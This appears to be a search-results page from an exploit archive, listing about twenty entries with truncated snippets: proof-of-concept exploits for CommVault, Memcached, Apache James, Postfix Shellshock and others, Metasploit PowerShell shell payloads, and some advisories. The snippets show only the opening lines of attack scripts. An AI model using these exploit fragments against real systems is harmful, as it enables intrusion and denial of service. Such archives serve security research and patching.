186 matches found
CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)
CommVault Edge 11 SP6 - Stack Buffer Overflow PoC import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp...
MobaXterm Personal Edition 9.4 Path Traversal
Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt + ISR: ApparitionSec Vendor: ===================== mobaxterm.mobatek.net Product: ===============================...
Axessh 4.2 - Denial Of Service
Axessh是一款windows下的ssh工具,使用后会开启ssh 22端口,并开启wsshed.exe服务,当wsshed.exe在接收字符串时,会调用BIGNUM相关函数进行处理,但对于BIGNUM的结构体没有进行赋初值,导致空指针引用引发拒绝服务漏洞,下面对此漏洞进行详细分析。 这里要提的一点是,Exploit-db给的PoC可以触发漏洞,但实际上,只要连接22端口,都会引发这个漏洞的发生,哪怕只发送一字节的内容。 附加wsshed.exe,执行PoC,引发中断,这边捕获到漏洞触发位置。 0:000 g f74.a68: Access violation - code c00000...
Memcached 1.4.33 - sasl (PoC)
Memcached 1.4.33 - sasl PoC Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODESET = "\x21" keylen = struct.pack"!H",32 bodylen = struct.pack"!I",1 packet = MEMCACHEDREQUESTMAGIC + OPCODESET + keylen + bodylen2 + "A"1000 if lensys.argv ...
h2o -- fix DoS attack vector
Frederik Deweerdt reported a denial-of-service attack vector due to an unhandled error condition during socket connection...
Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow Exploit
Exploit for windows platform in category remote exploits Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow Exploit Author: ArminCyber Version: 7.2 Tested on: XP SP3 EN category: Remote Exploit Usage: ./exploit.py ip port import socket import sys host =...
Apache James Server 2.3.2 - Remote Command Execution
Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution Date: 16\10\2014 Vendor Homepage: http://james.apache.org/server/ Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip 版本: Apache James Server 2.3.2 Tested on: Ubuntu, Debian...
Windows Interactive Powershell Session, Bind TCP
Interacts with a powershell session on an established socket connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include Msf::Payload::Sing...
Windows Interactive Powershell Session, Reverse TCP
Interacts with a powershell session on an established socket connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include Msf::Payload::Sing...
w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution
thehunter.py Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def...
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution
w3tw0rk Pitbull Perl IRC Bot - Remote Code Execution thehunter.py Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution Author: Jay Turla @shipcod3 Description: pitbull-w3tw0rkhunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows...
Solarwinds-Storage-Manager-5.1.0
Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit Date: May 2nd 2012 Author: muts Version: SolarWinds Storage Manager 5.1.0 Tested on: Windows 2003 Archive Url : http://www.offensive-security.com/0day/solarshell.txt import urllib, urllib2, cookielib import sys...
HP-VSA-Remote-Execution
HP VSA / SANiQ Hydra client Nicolas Grégoire [email protected] v0.5 HOST = '192.168.201.11' The remote host PORT = 13838 The hydra port import getopt import re import sys import binascii import struct import socket import os ''' ================================== Define functions...
HP-Data-Protector-EXEC_BAR
The omniinet service, which runs by default on port 5555, is susceptible to numerous remotely exploitable vulnerabilities. By sending a malicious EXECBAR packet opcode 11, a remote attacker can force the omniinet service to run an arbitrary command. On Windows, the omniinet service is running as...
Feng Office 1.7.4 - XSS / Arbitrary File Upload Exploit
Exploit for php platform in category web applications Source: http://www.securityfocus.com/bid/47049/info alert0" / alert0" / --------------------------------------------- Feng Office 1.7.4 - Arbitrary File Upload --------------------------------------------- import socket host = 'localhost' path...
Postfix SMTP - Shellshock Exploit
No description provided by source. !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 Tested on: Debian 7 postfix smtp server w/procmail CVE : 2014-6271 from...
ProFTPD 1.3.0/1.3.0 a (mod_ctrls support) Local Buffer Overflow Exploit vulnerabilities and attack code analysis-vulnerability warning-the black bar safety net
Exploit code URL: ! 1, Operating environment: 1, The ProFTPD 1.3.0/1.3.0 a 2, the compiled ProFTPD,--enable-ctrls option must be open ./ configure --enable-ctrls 3, the local user need to have through the Unix Socket permission to connect 2, The Run parameters: revenge@darklight$ ./...
MailMax <= 4.6 - POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
No description provided by source. !/usr/bin/python MailMax =v4.6 POP3 USER Remote Buffer Overflow Exploit No Login Needed Newer version's not tested, maybe vulnerable too A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break the payload and opcodes that gets...
iOS Serversman 3.1.5 - HTTP Remote DoS Exploit
No description provided by source. !/usr/bin/python Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit Found by: Steven Seeley mrme seeleymagic at hotmail dot com Homepage: http://serversman.com/indexen.jsp Download: From the app store Free - use your Itunes account Tested on: Iphone 3G...
MailEnable 1.8 - Remote Format String Denial of Service Exploit
No description provided by source. See-security Technologies ltd. http://www.see-security.com MailEnable 1.8 Format String DoS exploit Discovered by Mati Aharoni Coded by tal zeltzer import sys import time import socket def PrintLogo: print...